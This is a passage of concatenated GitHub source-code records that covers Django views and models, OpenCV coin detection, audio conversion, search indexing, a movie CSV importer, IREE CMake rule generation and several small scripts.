self.db.commit()\n","repo_name":"Skeesh24/omiko-data","sub_path":"app/database/mysql/repository.py","file_name":"repository.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25531941716","text":"#!/usr/bin/env python\nimport sys\nimport json\nimport logging\nlogging.basicConfig(level=logging.INFO)\nlog = logging.getLogger()\n\ndata = sys.argv[1:]\nmerged_data = {'data': []}\n\nfor path, tag in zip(data[0::2], data[1::2]):\n with open(path, 'r') as handle:\n ldata = json.load(handle)\n for element in ldata['data']:\n element['tag'] = tag\n merged_data['data'].append(element)\n\njson.dump(merged_data, sys.stdout)\n","repo_name":"lecorguille/cargo-port","sub_path":"bin/merge_apis.py","file_name":"merge_apis.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"4002973258","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom PIL import Image\n\n# Create your models here.\nclass Profile(models.Model):\n YEAR_IN_SCHOOL_CHOICES = [\n ('S', 'Scan'),\n ('1', 'Phase 1'),\n ('2', 'Phase 2'),\n ('3', 'Phase 3'),\n ('F', 'Final'),\n]\n user = models.OneToOneField(User,on_delete=models.CASCADE)\n roles=models.CharField(max_length=10,choices=YEAR_IN_SCHOOL_CHOICES,default='Scan')\n image = models.ImageField(default='default.jpg',upload_to='profile_pics')\n \n def __str__(self):\n return f'{self.user.username} Profile '\n def save(self,*args,**kwargs):\n super().save(*args,**kwargs)\n\n img=Image.open(self.image.path)\n if img.height >300 or img.width >300:\n output_size=(300,300)\n img.thumbnail(output_size)\n img.save(self.image.path)\n","repo_name":"Jalees-Jahanzaib/Production","sub_path":"users/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"74273206774","text":"from django.shortcuts import render,get_object_or_404,redirect\nfrom mainapp.models import table\nfrom .models import Conversation\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import ConversationMessageForm\nfrom django.http import JsonResponse\nfrom django.core import serializers\n# Create your views here.\n@login_required\ndef new_conversation(request,user_id):\n #get user and check for same user and add users and send message which we get from loaded form and we dont commit cause we fill foreign keys fields in db\n user = get_object_or_404(User,id=user_id)\n\n if user == request.user:\n return redirect(\"profile\",request.user.id)\n# conversations = Conversation.objects.filter(members__in=[request.user,user])\n\n# if conversations:\n# return redirect(\"conversation:detail\",pk=conversations.first().id)\n \n if request.method == \"POST\":\n form = ConversationMessageForm(request.POST)\n if form.is_valid():\n conversation = Conversation.objects.create()\n conversation.members.add(request.user)\n conversation.members.add(user)\n conversation.save()\n conversation_message = form.save(commit=False)\n conversation_message.conversation = conversation\n conversation_message.created_by = request.user\n conversation_message.save()\n last_chat =Conversation.objects.filter(members__in=[request.user.id]).order_by(\"-id\").first()\n return redirect('conversation:detail',last_chat.id)\n else:\n form = ConversationMessageForm()\n \n return render(request,'new.html',{\n 'form':form\n })\n@login_required\n#list of convs\ndef inbox(request):\n from mainapp .models import Profile\n get_Profile = Profile.objects.get(user=request.user)\n get_Profile.in_queue = False\n get_Profile.save()\n conversations = Conversation.objects.filter(members__in=[request.user.id])\n \n return render(request,'inbox.html',{\n 'conversations':conversations\n })\n\n@login_required\n#getting messages and send message which we get from forms which was loaded\ndef detail(request,pk):\n conversation = Conversation.objects.filter(members__in=[request.user.id]).get(pk=pk)\n \n \n \n if request.method =='POST':\n form = ConversationMessageForm(request.POST)\n if form.is_valid():\n conversation_message = form.save(commit=False)\n conversation_message.conversation = conversation\n conversation_message.created_by = request.user\n conversation_message.save()\n\n conversation.save()\n \n return redirect('conversation:detail',pk=pk)\n else:\n \n form = ConversationMessageForm()\n \n\n return render(request,'detail_converse.html',{\n 'conversation':conversation,\n 'form':form\n })\ndef detail_ajax(request,conversation_id):\n conversation = Conversation.objects.get(id=conversation_id)\n conv = conversation.messages.all()\n conv_seri = serializers.serialize(\"json\",conv)\n return JsonResponse(conv_seri,safe=False)\n\n","repo_name":"Nicheye/leng_open_source","sub_path":"conversation/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3247,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"1424183146","text":"import unittest\nfrom datastorage.labelstorage import *\n\n\nclass TestLabels(unittest.TestCase):\n\n l = LabelManager('test_project')\n\n def setUp(self):\n self.l.create_tables()\n\n def tearDown(self):\n self.l._cur.execute('DROP TABLE labelType')\n self.l._cur.execute('DROP TABLE labelData')\n self.l._cur.execute('DROP TABLE fileMapping')\n\n def test_add_del_label_type(self):\n self.l.add_label_type('label1', \"red\", 'This is a test label') # add new label type with name 'label1'\n self.assertNotEqual(0, len(self.l.get_label_types())) # new label type should be in the table\n self.l.add_label(datetime.now(), datetime.now(), 'label1', 'sensor1') # create a label with the new type\n self.l.delete_label_type('label1')\n self.assertEqual(0, len(\n self.l._cur.execute('SELECT * FROM labelType').fetchall())) # label type should not be in the table\n self.assertEqual(0, len(\n self.l._cur.execute('SELECT * FROM labelData').fetchall())) # label should not be in the table\n\n def test_add_del_label(self):\n label_time = datetime.now()\n self.l.add_label(label_time, label_time, 'label1', 'sensor1') # add new label at time 1.5 to sensor 'sensor1'\n self.assertNotEqual(0, len(self.l.get_all_labels('sensor1'))) # new label should be in the table\n self.assertNotEqual(0, len(self.l.get_labels_date('sensor1', label_time.date())))\n self.assertNotEqual(0, len(self.l.get_labels_between_dates('sensor1', label_time, label_time)))\n self.l.delete_label(label_time, 'sensor1')\n self.assertEqual(0, len(self.l.get_all_labels('sensor1'))) # label should not be in the table\n self.assertEqual(0, len(self.l.get_labels_date('sensor1', label_time.date())))\n self.assertEqual(0, len(self.l.get_labels_between_dates('sensor1', label_time, label_time)))\n\n def test_update_label_type(self):\n label_time = datetime.now()\n self.l.add_label_type('label1', \"red\", 'This is a test label') # add new label type with name 'label1'\n self.l.add_label(label_time, label_time, 'label1', 'sensor1') # create a label with the new type\n self.assertEqual('label1', self.l._cur.execute('SELECT Name FROM labelType')\n .fetchone()[0]) # label type name should be 'label1'\n self.assertEqual(\"red\", self.l._cur.execute('SELECT Color FROM labelType')\n .fetchone()[0]) # label type color should be \"red\"\n self.assertEqual('This is a test label', self.l._cur.execute('SELECT Description FROM labelType')\n .fetchone()[0]) # label type description should be 'This is a test label'\n self.l.update_label_color('label1', \"blue\")\n self.assertEqual(\"blue\", self.l._cur.execute('SELECT Color FROM labelType')\n .fetchone()[0]) # label type color should now be \"blue\"\n self.l.update_label_description('label1', 'This is a changed description')\n self.assertEqual('This is a changed description', self.l._cur.execute('SELECT Description FROM labelType')\n .fetchone()[0]) # label type description should now be 'This is a changed description'\n self.l.update_label_name('label1', 'label2')\n self.assertEqual('label2', self.l._cur.execute('SELECT Name FROM labelType')\n .fetchone()[0]) # label type name should now be 'label2'\n self.assertEqual('label2', self.l._cur.execute('SELECT Label_name FROM labelData')\n .fetchone()[0]) # label created with the label type should also be named 'label2' now\n\n def test_file_mapping(self):\n date = datetime.now()\n self.l.add_file('file.txt', 'sensor', date)\n self.assertTrue(self.l.file_is_added('file.txt'))\n self.assertIn('file.txt', self.l.get_file_paths('sensor', date, date))\n self.assertIn('sensor', self.l.get_sensor_ids())\n","repo_name":"Semakon/Pppp_pipeline","sub_path":"test/datastorage/TestLabels.py","file_name":"TestLabels.py","file_ext":"py","file_size_in_byte":3991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24710488346","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\":Mod: __init__\n\n:Synopsis:\n\n:Author:\n servilla\n\n:Created:\n 3/16/18\n\"\"\"\n\nimport logging\nimport os\n\nimport daiquiri\n\ncwd = os.path.dirname(os.path.realpath(__file__))\nlogfile = cwd + '/soh.log'\ndaiquiri.setup(level=logging.WARN,\n outputs=(daiquiri.output.File(logfile), 'stdout',))\nlogger = daiquiri.getLogger('__init__.py: ' + __name__)\n\n\ndef main():\n return 0\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"PASTAplus/soh","sub_path":"src/soh/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33511463565","text":"import pickle\nimport os\n\nhigh_scores_filename = 'high_scores.dat'\n\nscores = []\n\n# first time you run this, \"high_scores.dat\" won't exist\n# so we need to check for its existence before we load\n# our \"database\"\nif os.path.exists(high_scores_filename):\n # \"with\" statements are very handy for opening files.\n with open(high_scores_filename,'rb') as rfp:\n scores = pickle.load(rfp)\n # Notice that there's no \"rfp.close()\"\n # ... the \"with\" clause calls close() automatically!\n\nfirst_name = input(\"Please enter your name:\")\nscore = input(\"Please enter your score:\")\n\nhigh_scores = first_name, score\nscores.append(high_scores)\n\n# Now we \"sync\" our database\nwith open(high_scores_filename,'wb') as wfp:\n pickle.dump(scores, wfp)\n\n# Re-load our database\nwith open(high_scores_filename,'rb') as rfp:\n scores = pickle.load(rfp)\n\nprint(scores)","repo_name":"matthewfeliciano/_PythonClass-IT-FDN-100-A","sub_path":"Module07/High_Scores.py","file_name":"High_Scores.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"3645205948","text":"import sys\nimport numpy as np\nimport cv2\n\n\n# 입력 이미지 불러오기\nimg_path = 'coin_custom.jpg'\n# 'coins1.jpg' 'coin_custom.jpg'\nsrc = cv2.imread(img_path)\n\nif src is None:\n print('Image open failed!')\n sys.exit()\n\ngray = cv2.cvtColor(src, cv2.COLOR_BGR2GRAY)\ncv2.imshow('gray', gray)\nblr = cv2.GaussianBlur(gray, (0, 0), 1) # 가우스블러 고주파노이즈 제거\ncv2.imshow('gausblr', blr)\n\n# 허프 변환 원 검출\n# 입력영상, HOUGH_GRADIENT or HOUGH_GRADIENT_ALT, 배열크기1, 원의 중심점 최소거리,\n# 임계값1,2 , 검출할 최소최대 반지름1,2)\ncircles = cv2.HoughCircles(blr, cv2.HOUGH_GRADIENT, 1, 50,\n param1=150, param2=40, minRadius=20, maxRadius=80)\n#print(circles)\n\n# 원 검출 결과 및 동전 금액 출력\nsum_of_money = 0\n# 깊은 복사\ndst = src.copy()\nif circles is not None:\n for i in range(circles.shape[1]):\n cx, cy, radius = circles[0][i]\n cv2.circle(dst, (cx, cy), radius, (0, 0, 255), 2, cv2.LINE_AA) # 원그리기\n\n # 동전 영역 부분 영상 추출\n x1 = int(cx - radius)\n y1 = int(cy - radius)\n x2 = int(cx + radius)\n y2 = int(cy + radius)\n radius = int(radius) # 반지름\n #print(\"radius : {}\".format(radius))\n\n crop = dst[y1:y2, x1:x2, :]\n ch, cw = crop.shape[:2]\n\n # 동전 영역에 대한 ROI 마스크 영상 생성\n mask = np.zeros((ch, cw), np.uint8)\n cv2.circle(mask, (cw//2, ch//2), radius, 255, -1)\n #cv2.imshow('mask', mask)\n\n # hue는 1바퀴 0~179\n # 동전 영역 Hue 색 성분을 +40 시프트하고, Hue 평균을 계산\n hsv = cv2.cvtColor(crop, cv2.COLOR_BGR2HSV)\n hue, _, _ = cv2.split(hsv)\n hue_shift = (hue + 40) % 180 # hue +40밝게 쉬프트\n #cv2.imshow('hue_shift',hue_shift)\n mean_of_hue = cv2.mean(hue_shift, mask)[0] # meanStdDev() 평균과 표준편차 계산\n # mean 매개변수\n # src\t결과를 Scalar_ 에 저장할 수 있도록 1~4개의 채널을 가져야 하는 입력 배열입니다 .\n # 평균\t출력 매개변수: 계산된 평균 값.\n # 표준 데브\t출력 매개변수: 계산된 표준 편차.\n # 마스크\t선택적 작업 마스크.\n \n #print(\"mean_of_hue : {}\".format(mean_of_hue))\n\n # hue 반지름\n # 10원 55 53 55.7 56.3\n # 50원 44.8 49.3 51.9,53.6\n # 100원 22.7 34.2 58.9 59.2\n # 500원 63.6 ,56.2 62.5, 62.5\n\n # radius 반지름크기 50이상은 500원, 사이 100,10원은 색상 hue값 구별, 45.5이하는 50원,\n # 색이 hue 평균40이하(흑백동) 40이상(주황10원)\n # radius > 50\n won = 500 # radius 54 hue 56\n if 45.5 < radius < 50: # 100won,10won\n if mean_of_hue < 40:\n won = 100\n else:\n won = 10\n elif radius <= 45.5: # 50won\n won = 50\n sum_of_money += won\n\n cv2.putText(crop, str(won), (20, 50), cv2.FONT_HERSHEY_SIMPLEX,\n 0.75, (255, 0, 0), 2, cv2.LINE_AA)\n\n# sum_of_money 변수에 있는값 글씨 쓰기\ncv2.putText(dst, str(sum_of_money) + ' won', (40, 80),\n cv2.FONT_HERSHEY_DUPLEX, 2, (255, 0, 0), 2, cv2.LINE_AA)\n\ncv2.imshow('src', src)\ncv2.imshow('dst', dst)\ncv2.waitKey()\n\ncv2.destroyAllWindows()\n","repo_name":"kanghc1230/lane_recognition","sub_path":"coin_count2.py","file_name":"coin_count2.py","file_ext":"py","file_size_in_byte":3415,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30233284397","text":"import os\n\nimport librosa\nimport numpy as np\nfrom pydub import AudioSegment\nfrom scipy.io import wavfile as wavfile\n\nfrom munging.file_methods import prefix_filename, find_filetype\n\n\ndef convert_wavelength_file(filepath, wavelength, replace=True):\n \"\"\"\n :param filepath: directory of file\n :param wavelength: new wavelength\n :param replace: whether to replace the file or make a file with prefix = new\n :return: prints out when the job is done\n \"\"\"\n\n # since this is a conversion, we have to use librosa's library which is slower than scipy\n if not replace:\n filepath = prefix_filename(filepath, 'new_')\n # check whether it needs to be converted or not using scipy wav, faster load time\n sample_rate, audio_array = wavfile.read(filepath)\n\n if (sample_rate != wavelength) or (audio_array.dtype != np.int16): # if not, then convert\n audio_array, sample_rate = librosa.load(filepath, sr=wavelength)\n maxv = np.iinfo(np.int16).max\n librosa.output.write_wav(filepath, (audio_array * maxv).astype(np.int16), sample_rate)\n print(\"The file\", '\"{}\"'.format(filepath), \"has been converted from\", sample_rate, \"to\", wavelength)\n\n\ndef convert_mp3_to_wav(filepath, replace=False):\n \"\"\"Converts mp3 to wav\"\"\"\n\n if find_filetype(filepath) != 'mp3':\n raise ValueError(\"This file isn't mp3\")\n sound = AudioSegment.from_mp3(filepath)\n # convert mp3 to wav in filepath\n filepath_new = filepath.replace(\"mp3\", \"wav\")\n\n sound.export(filepath_new, format=\"wav\")\n\n if replace:\n # just delete the old mp3 file\n os.remove(filepath)\n","repo_name":"liuyang1123/speech2text","sub_path":"munging/formatting.py","file_name":"formatting.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10035938473","text":"def get_index_for_word(word, index):\n # returns the index entry for a certain word, if it exists\n\n if index.get(word):\n return {i[1]: i[0] for i in index.get(word)}\n else:\n return\n\n\ndef print_index_for_word(word, index):\n # gets the index entry for the word if it exists, and prints the output in a pretty way\n\n result = get_index_for_word(word, index)\n if result:\n base = \"{:>5} | {}\"\n print()\n print(base.format(\"Count\", \"Address\"))\n print(\"-\" * 80)\n for page in result:\n print(base.format(result[page], page))\n print()\n else:\n print(\"No results found in index for {}\".format(word))\n return\n\n\ndef search(search_index, terms):\n # searches the index for pages containing all the search terms, rank by count on page\n\n index_terms = [get_index_for_word(term, search_index) for term in terms]\n search_results = []\n\n # seeing as we want an intersection, if any of them are empty return no results\n for term in index_terms:\n if term is None:\n return\n\n # multiply counts together to get index value, if it's not there multiply by 0 to remove the url\n for url in index_terms[0]:\n multiplier = index_terms[0][url]\n for term in index_terms[1:]:\n multiplier *= term.get(url, 0)\n\n if multiplier:\n search_results.append([url, multiplier])\n\n # if there's no intersection return nothing\n if not search_results:\n return\n\n # sort descending by index number and return\n search_results.sort(key=lambda x: x[1], reverse=True)\n\n return search_results\n\n\ndef print_search_results(index, terms):\n # get search results and print out the urls\n\n results = search(index, terms)\n\n if results:\n print(\"\\nSearch results:\")\n for result in results:\n print(\"{}\".format(result[0]))\n print(\"\")\n else:\n print(\"No results for search\")\n","repo_name":"ashleyoldershaw/all-roads-lead-to-rome","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"38138632092","text":"from django.core.management.base import BaseCommand\nfrom django.conf import settings\nimport os\nimport csv\n\nfrom apps.movie.models import Movie, Genres, Keywords, Artist, MovieActors\n\n\nclass Command(BaseCommand):\n csv_data = os.path.join(settings.BASE_DIR, 'movie_metadata.csv')\n\n def has_value(self, value):\n if len(value) > 0:\n return value\n else:\n return 0\n\n def handle(self, *args, **kwargs):\n with open(self.csv_data, encoding=\"utf-8\") as csv_file:\n reader = csv.DictReader(csv_file)\n i = 0\n for row in reader:\n i += 1\n\n try:\n m = Movie.objects.get(movie_title=row['movie_title'])\n except Movie.DoesNotExist:\n m = None\n\n if m is None:\n movie = Movie.objects.create(\n movie_title=row['movie_title'],\n color=row['color'],\n num_critic_for_reviews=self.has_value(row['num_critic_for_reviews']),\n duration=self.has_value(row['duration']),\n gross=self.has_value(row['gross']),\n num_voted_users=self.has_value(row['num_voted_users']),\n cast_total_facebook_likes=self.has_value(row['cast_total_facebook_likes']),\n facenumber_in_poster=self.has_value(row['facenumber_in_poster']),\n movie_imdb_link=row['movie_imdb_link'],\n num_user_for_reviews=self.has_value(row['num_user_for_reviews']),\n language=row['language'],\n country=row['country'],\n content_rating=self.has_value(row['content_rating']),\n budget=self.has_value(row['budget']),\n title_year=self.has_value(row['title_year']),\n imdb_score=self.has_value(row['imdb_score']),\n aspect_ratio=self.has_value(row['aspect_ratio']),\n movie_facebook_likes=self.has_value(row['movie_facebook_likes'])\n\n # director_name=row['director_name'],\n # director_facebook_likes=self.has_value(row['director_facebook_likes']),\n # actor_1_name=row['actor_1_name'],\n # actor_1_facebook_likes=self.has_value(row['actor_1_facebook_likes']),\n # actor_2_name=row['actor_2_name'],\n # actor_2_facebook_likes=self.has_value(row['actor_2_facebook_likes']),\n # actor_3_name=row['actor_3_name'],\n # actor_3_facebook_likes=self.has_value(row['actor_3_facebook_likes']),\n\n )\n\n director, created = Artist.objects.get_or_create(\n name=row['director_name'],\n likes=row['director_facebook_likes'],\n role='d'\n )\n movie.director = director\n\n if row['actor_1_name']:\n actor, created = Artist.objects.get_or_create(\n # Important:\n # don't search by role because the Artist can\n # be as a director or an actor in a different movies\n # don't use facebook likes because it is his likes in the Movie ( not total likes )\n name=row['actor_1_name']\n )\n MovieActors.objects.create(\n artist=actor,\n movie=movie,\n likes=row['actor_1_facebook_likes']\n ).save()\n\n if row['actor_2_name']:\n actor, created = Artist.objects.get_or_create(\n name=row['actor_2_name']\n )\n MovieActors.objects.create(\n artist=actor,\n movie=movie,\n likes=row['actor_2_facebook_likes']\n ).save()\n\n if row['actor_3_name']:\n actor, created = Artist.objects.get_or_create(\n name=row['actor_3_name']\n )\n MovieActors.objects.create(\n artist=actor,\n movie=movie,\n likes=row['actor_3_facebook_likes']\n ).save()\n\n genres = row['genres'].split('|')\n for genre in genres:\n if len(genre) > 0:\n item, created = Genres.objects.get_or_create(name=genre)\n movie.genres.add(item)\n\n plot_keywords = row['plot_keywords'].split('|')\n for keyword in plot_keywords:\n if len(keyword) > 0:\n item, created = Keywords.objects.get_or_create(name=keyword)\n movie.plot_keywords.add(item)\n\n movie.save()\n","repo_name":"FiodorLaptev/movies","sub_path":"apps/movie/management/commands/import_movies.py","file_name":"import_movies.py","file_ext":"py","file_size_in_byte":5303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26660009355","text":"from dataclasses import dataclass\nfrom typing import List, Optional, Sequence\nimport os\nimport pathlib\nimport urllib.parse\n\nfrom e2e_test_framework.definitions import common_definitions, iree_definitions\nimport cmake_builder.rules\n\n# Archive extensions used to pack models.\nARCHIVE_FILE_EXTENSIONS = [\".tar\", \".gz\"]\n# CMake variable name to store IREE package name.\nPACKAGE_NAME_CMAKE_VARIABLE = \"_PACKAGE_NAME\"\n\n\n@dataclass\nclass ModelRule(object):\n target_name: str\n file_path: str\n cmake_rule: str\n\n\n@dataclass\nclass IreeModelImportRule(object):\n target_name: str\n model_id: str\n model_name: str\n output_file_path: str\n mlir_dialect_type: str\n cmake_rule: Optional[str]\n\n\n@dataclass\nclass IreeModuleCompileRule(object):\n target_name: str\n output_module_path: str\n cmake_rule: str\n\n\ndef _build_target_path(target_name: str):\n \"\"\"Returns the full target path by combining the variable of package name and\n the target name.\n \"\"\"\n return f\"${{{PACKAGE_NAME_CMAKE_VARIABLE}}}_{target_name}\"\n\n\nclass CommonRuleFactory(object):\n \"\"\"Generates common cmake rules.\"\"\"\n\n def __init__(self, model_artifacts_dir: str):\n \"\"\"Constructs a CommonRuleFactory.\n\n Args:\n model_artifacts_dir: root directory to store model files. Can contain\n CMake variable syntax in the path.\n \"\"\"\n self._model_artifacts_dir = model_artifacts_dir\n self._model_rules = {}\n\n def add_model_rule(self, model: common_definitions.Model) -> ModelRule:\n \"\"\"Adds a rule to fetch a model. Reuses the existing rule when possible.\"\"\"\n if model.id in self._model_rules:\n return self._model_rules[model.id]\n\n # Model target: -model-\n target_name = f\"model-{model.id}\"\n\n model_url = urllib.parse.urlparse(model.source_url)\n\n # Drop the archive extensions.\n file_exts = pathlib.PurePath(model_url.path).suffixes\n while len(file_exts) > 0 and file_exts[-1] in ARCHIVE_FILE_EXTENSIONS:\n file_exts.pop()\n model_ext = \"\".join(file_exts)\n\n # Model path: /_\n model_path = f\"{self._model_artifacts_dir}/{model.id}_{model.name}{model_ext}\"\n\n if model_url.scheme == \"https\":\n cmake_rule = (f'# Fetch the model from \"{model.source_url}\"\\n' +\n cmake_builder.rules.build_iree_fetch_artifact(\n target_name=target_name,\n source_url=model.source_url,\n output=model_path,\n unpack=True))\n else:\n raise ValueError(\"Unsupported model url: {model.source_url}.\")\n\n model_rule = ModelRule(target_name=target_name,\n file_path=model_path,\n cmake_rule=cmake_rule)\n\n self._model_rules[model.id] = model_rule\n return model_rule\n\n def generate_cmake_rules(self) -> List[str]:\n \"\"\"Dump all cmake rules in a correct order.\"\"\"\n return [rule.cmake_rule for rule in self._model_rules.values()]\n\n\nclass IreeRuleFactory(object):\n \"\"\"Generates IREE benchmark cmake rules.\"\"\"\n\n def __init__(self, iree_artifacts_dir):\n \"\"\"Constructs an IreeRuleFactory.\n\n Args:\n iree_artifacts_dir: root directory to store generated IREE artifacts. Can\n contain CMake variable syntax in the path.\n \"\"\"\n self._iree_artifacts_dir = iree_artifacts_dir\n self._import_model_rules = {}\n self._compile_module_rules = {}\n\n def add_import_model_rule(\n self,\n model_id: str,\n model_name: str,\n model_source_type: common_definitions.ModelSourceType,\n model_entry_function: str,\n source_model_rule: ModelRule,\n ) -> IreeModelImportRule:\n \"\"\"Adds a rule to fetch the model and import into MLIR. Reuses the rule when\n possible.\"\"\"\n\n if model_id in self._import_model_rules:\n return self._import_model_rules[model_id]\n\n # If the source model is MLIR, no import rule is needed.\n if model_source_type == common_definitions.ModelSourceType.EXPORTED_LINALG_MLIR:\n import_model_rule = IreeModelImportRule(\n target_name=source_model_rule.target_name,\n model_id=model_id,\n model_name=model_name,\n output_file_path=source_model_rule.file_path,\n mlir_dialect_type=\"linalg\",\n cmake_rule=None)\n self._import_model_rules[model_id] = import_model_rule\n return import_model_rule\n\n # Import target: _iree-import-model-\n target_name = f\"iree-import-model-{model_id}\"\n\n # Imported MLIR path: /_/.mlir\n output_file_path = f\"{self._iree_artifacts_dir}/{model_id}_{model_name}/{model_name}.mlir\"\n\n if model_source_type == common_definitions.ModelSourceType.EXPORTED_TFLITE:\n cmake_rule = (\n f'# Import the TFLite model \"{source_model_rule.file_path}\"\\n' +\n cmake_builder.rules.build_iree_import_tflite_model(\n target_path=_build_target_path(target_name),\n source=source_model_rule.file_path,\n output_mlir_file=output_file_path))\n mlir_dialect_type = \"tosa\"\n elif model_source_type == common_definitions.ModelSourceType.EXPORTED_TF:\n cmake_rule = (\n f'# Import the Tensorflow model \"{source_model_rule.file_path}\"\\n' +\n cmake_builder.rules.build_iree_import_tf_model(\n target_path=_build_target_path(target_name),\n source=source_model_rule.file_path,\n entry_function=model_entry_function,\n output_mlir_file=output_file_path))\n mlir_dialect_type = \"mhlo\"\n else:\n raise ValueError(\n f\"Unsupported source type '{model_source_type}' of the model '{model_id}'.\"\n )\n\n cmake_builder.rules.build_add_dependencies(\n target=\"iree-benchmark-import-models\",\n deps=[_build_target_path(target_name)])\n\n import_model_rule = IreeModelImportRule(target_name=target_name,\n model_id=model_id,\n model_name=model_name,\n output_file_path=output_file_path,\n mlir_dialect_type=mlir_dialect_type,\n cmake_rule=cmake_rule)\n\n self._import_model_rules[model_id] = import_model_rule\n return import_model_rule\n\n def add_compile_module_rule(self,\n compile_config: iree_definitions.CompileConfig,\n model_import_rule: IreeModelImportRule):\n \"\"\"Adds a rule to compile a MLIR into a IREE module. Reuses the existing\n rule when possible.\"\"\"\n\n model_id = model_import_rule.model_id\n model_name = model_import_rule.model_name\n\n target_id = f\"{model_id}-{compile_config.id}\"\n if target_id in self._compile_module_rules:\n return self._compile_module_rules[target_id]\n\n # Module target: _iree-module--\n target_name = f\"iree-module-{target_id}\"\n\n # Module path: /_/.vmfb\n output_path = os.path.join(self._iree_artifacts_dir,\n f\"{model_id}_{model_name}\",\n f\"{compile_config.id}.vmfb\")\n\n compile_flags = self._generate_iree_compile_flags(\n compile_config=compile_config,\n mlir_dialect_type=model_import_rule.mlir_dialect_type\n ) + compile_config.extra_flags\n\n cmake_rule = (f'# Compile the module \"{output_path}\"\\n' +\n cmake_builder.rules.build_iree_bytecode_module(\n target_name=target_name,\n src=model_import_rule.output_file_path,\n module_name=output_path,\n flags=compile_flags))\n cmake_rule += cmake_builder.rules.build_add_dependencies(\n target=\"iree-benchmark-suites\", deps=[_build_target_path(target_name)])\n compile_module_rule = IreeModuleCompileRule(target_name=target_name,\n output_module_path=output_path,\n cmake_rule=cmake_rule)\n\n # TODO(#10155): Dump the compile flags from iree_bytecode_module into a flagfile.\n\n self._compile_module_rules[target_id] = compile_module_rule\n return compile_module_rule\n\n def generate_cmake_rules(self) -> List[str]:\n \"\"\"Dump all cmake rules in a correct order.\"\"\"\n import_model_rules = [\n rule.cmake_rule for rule in self._import_model_rules.values()\n ]\n compile_module_rules = [\n rule.cmake_rule for rule in self._compile_module_rules.values()\n ]\n return import_model_rules + compile_module_rules\n\n def _generate_iree_compile_flags(\n self, compile_config: iree_definitions.CompileConfig,\n mlir_dialect_type: str) -> List[str]:\n if len(compile_config.compile_targets) != 1:\n raise ValueError(f\"Only one compile target is supported. Got:\"\n f\" {compile_config.compile_targets}\")\n\n compile_target = compile_config.compile_targets[0]\n flags = [\n f\"--iree-hal-target-backends={compile_target.target_backend.value}\",\n f\"--iree-input-type={mlir_dialect_type}\"\n ]\n flags.extend(self._generate_iree_compile_target_flags(compile_target))\n return flags\n\n def _generate_iree_compile_target_flags(\n self, target: iree_definitions.CompileTarget) -> List[str]:\n arch_info: common_definitions.ArchitectureInfo = target.target_architecture.value\n if arch_info.architecture == \"x86_64\":\n flags = [\n f\"--iree-llvm-target-triple=x86_64-unknown-{target.target_abi.value}\",\n f\"--iree-llvm-target-cpu={arch_info.microarchitecture.lower()}\"\n ]\n else:\n raise ValueError(f\"Unsupported architecture '{arch_info.architecture}'\")\n return flags\n\n\ndef _generate_iree_rules(\n common_rule_factory: CommonRuleFactory, iree_artifacts_dir: str,\n module_generation_configs: Sequence[iree_definitions.ModuleGenerationConfig]\n) -> List[str]:\n iree_rule_factory = IreeRuleFactory(iree_artifacts_dir)\n for module_generation_config in module_generation_configs:\n model = module_generation_config.model\n compile_config = module_generation_config.compile_config\n\n source_model_rule = common_rule_factory.add_model_rule(model)\n import_rule = iree_rule_factory.add_import_model_rule(\n model_id=model.id,\n model_name=model.name,\n model_source_type=model.source_type,\n model_entry_function=model.entry_function,\n source_model_rule=source_model_rule)\n iree_rule_factory.add_compile_module_rule(compile_config=compile_config,\n model_import_rule=import_rule)\n\n return iree_rule_factory.generate_cmake_rules()\n\n\ndef generate_rules(\n model_artifacts_dir: str, iree_artifacts_dir: str,\n iree_module_generation_configs: Sequence[\n iree_definitions.ModuleGenerationConfig]\n) -> List[str]:\n \"\"\"Generates cmake rules to build benchmarks.\n \n Args:\n model_artifacts_dir: root directory to store model files. Can contain CMake\n variable syntax in the path.\n iree_artifacts_dir: root directory to store generated IREE artifacts. Can\n contain CMake variable syntax in the path.\n iree_module_generation_configs: compile configs for IREE targets.\n Returns:\n List of CMake rules.\n \"\"\"\n common_rule_factory = CommonRuleFactory(model_artifacts_dir)\n iree_rules = _generate_iree_rules(common_rule_factory, iree_artifacts_dir,\n iree_module_generation_configs)\n # Currently the rules are simple so the common rules can be always put at the\n # top. Need a topological sort once the dependency gets complicated.\n return common_rule_factory.generate_cmake_rules() + iree_rules\n","repo_name":"smallccn/iree","sub_path":"build_tools/python/e2e_test_framework/cmake_rule_generator.py","file_name":"cmake_rule_generator.py","file_ext":"py","file_size_in_byte":11821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"18385916282","text":"# May Trinh\n# CMPS 4143 - Contemporary Programming Language\n# This program will open a file with decimal number, -1 is the sentinel value that will end the program\n# It will call a recursive function to convert the decimal number to binary number. \n\n#recursive function that returns the binary of a decimal number as 